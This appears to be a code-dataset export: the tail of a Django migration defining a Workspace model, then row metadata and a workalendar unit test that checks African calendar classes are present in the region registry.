name='Workspace',
fields=[
('id', models.CharField(max_length=8, primary_key=True, serialize=False, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('title', models.CharField(default='', max_length=150)),
('description', models.TextField(default='')),
('snapshots', sortedm2m.fields.SortedManyToManyField(help_text=None, to='gsmap.Snapshot')),
],
options={
'ordering': ['-created'],
},
),
]
| 34.028571
| 134
| 0.577666
|
5ae64ff1dba0481fdeaca1b08764c378a783c68c
| 649
|
py
|
Python
|
workalendar/tests/test_registry_africa.py
|
ftatarli/workalendar
|
111d2268f6153cfa1906823409103f5d532f7b8b
|
[
"MIT"
] | 2
|
2020-07-15T09:56:41.000Z
|
2021-02-04T18:11:28.000Z
|
workalendar/tests/test_registry_africa.py
|
ftatarli/workalendar
|
111d2268f6153cfa1906823409103f5d532f7b8b
|
[
"MIT"
] | null | null | null |
workalendar/tests/test_registry_africa.py
|
ftatarli/workalendar
|
111d2268f6153cfa1906823409103f5d532f7b8b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from unittest import TestCase
from workalendar.africa import (
Algeria,
Benin,
IvoryCoast,
Madagascar,
SaoTomeAndPrincipe,
SouthAfrica,
)
from workalendar.registry import registry
class RegistryAfrica(TestCase):
def test_africa(self):
classes = (v for k, v in registry.region_registry.items())
classes = list(classes)
self.assertIn(Algeria, classes)
self.assertIn(Benin, classes)
self.assertIn(IvoryCoast, classes)
self.assertIn(Madagascar, classes)
self.assertIn(SaoTomeAndPrincipe, classes)
self.assertIn(SouthAfrica, classes)
| 24.961538
| 66
| 0.681048
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.